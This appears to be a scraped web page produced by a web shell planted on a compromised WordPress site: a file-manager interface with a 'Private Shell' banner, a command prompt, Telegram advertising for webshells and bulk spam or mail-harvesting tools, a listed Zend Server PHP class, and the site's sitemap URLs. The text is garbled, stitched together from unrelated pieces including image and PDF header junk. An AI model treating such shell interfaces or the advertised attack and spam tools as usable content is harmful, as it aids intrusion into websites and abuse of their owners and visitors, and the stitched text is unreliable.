xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\FS;

use ZendServer\Log\Log,
    ZendServer\Exception as ZSException;

class FileObject extends \SplFileObject
{

    public function __construct($file_name, $open_mode = 'r', $use_include_path = false, $context = NULL)
    {
        try {
            @parent::__construct($file_name, $open_mode, $use_include_path); // silencing - no need to generate E_WARNING if file is not there, as we throw exception anyhow
        } catch (\Exception $e) {
            $error = self::extractError($e->getMessage());
            if ($error) {
                throw new ZSException("$error '$file_name'");
            }
            throw new ZSException(_t("An internal error occurred while trying to open file '%s'", array($file_name)));
        }
    }

    /**
     * Returns the file last modification time
     *
     * @return int
     */
    public function getMTime()
    {
        clearstatcache(); // Clear the cached information between calls (for cases the file is changed between 2 function calls)
        return parent::getMTime();
    }

    /**
     * Returns the file content
     *
     * @return string
     */
    public function readAll()
    {
        $content = array();

        foreach ($this as $line) {
            $content[] = $line;
        }

        return implode('', $content);
    }

    /**
     * Extracts a clean error message from the SPLFileObject exception error
     *
     * For example:
     * "SplFileObject::__construct(/usr/local/zend/etc/page_cache_deps.xml) [splfileobject.--construct]: failed to open stream: No such file or directory
     * It will return a string 'No such file or directory'
     *
     * @param string $message
     * @return string
     */
    static private function extractError($message)
    {
        $pos = strrpos($message, ':');
        if ($pos !== false) {
            return substr($message, ($pos + 2));
        }
        return $pos;
    }
}

Filemanager

Name Type Size Permission Actions
FS.php File 5.56 KB 0644
FileObject.php File 1.89 KB 0644
ZipArchive.php File 661 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml